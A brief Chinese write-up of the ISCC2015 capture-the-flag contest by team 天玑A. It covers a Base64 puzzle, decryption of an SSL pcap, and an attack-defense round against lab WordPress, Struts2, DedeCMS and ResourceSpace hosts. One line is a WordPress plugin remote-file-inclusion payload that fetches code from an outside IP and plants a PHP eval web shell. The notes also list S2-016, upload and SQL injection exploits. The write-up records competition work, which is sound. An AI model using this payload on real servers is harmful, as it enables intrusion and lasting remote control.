
ISCC2015-天玑A

选择题
慢慢做,不着急
分还是挺多的

关卡题
只有两个
BASIC2:莫名其妙的字符串
给出一个小写和数字混合字符串,词频分析后既不是单表替换,没有提示,同时也不符合其他古典密码规律,根据以往经验,猜测是一串Base64,于是尝试修改大小写,发现了flag字符串,确定后根据base64的编码规律写一个程序分组爆破明文,得到flag
REVERSE-迷茫的嗅探器
pacp包是SSL加密过的,虽然给出了私钥文件,但是经过OpenSSL加密,使用kali中的OpenSSL解密私钥后得到真实私钥,密码为弱口令123456。
然后再WireShark中加载私钥文件后即可恢复数据包明文,搜索所有POST内容后发现管理员修改的密码,即为Flag
PS:第一个包是用错误密码登陆,之后改了一次密码

攻防
Setp 1 拓扑
nmap
Wordpress:
192.168.4.x,192.168.8.x,...,192.168.52.x
DedeCMS:
192.168.237.x
Struct2:
192.168.237.x:8080
192.168.4.x,...,192.168.8.x,...
It works:
ResourceSpace:
192.168.237.x
OtherPorts:
5555,445,135,21,...
Setp 2 漏洞扫描与利用
many
Wordpress:
192.168.4.x,192.168.8.x,...,192.168.52.x
http://192.168.32.20/wordpress/wp-content/plugins/mygallery/
myfunctions/mygallerybrowser.php?myPath=http://173.17.0.78/6.txt?<?php
fputs(fopen('1.php','w+'),'<?php @eval($_POST["hehe"])?>');
?>Setp 2 漏洞扫描与利用
many
S2-016 √
Struct2:
192.168.237.x
Setp 2 漏洞扫描与利用
many
DedeCMS:
192.168.237.x
会员中心头像上传漏洞 √
变量覆盖
还有一个
Setp 2 漏洞扫描与利用
many
192.168.237.x
SQLI √
ResourceSpace:
Setp 3 提权保住shell
?
NULL

OVER
Text
天玑A-
By lc
天玑A-
- 747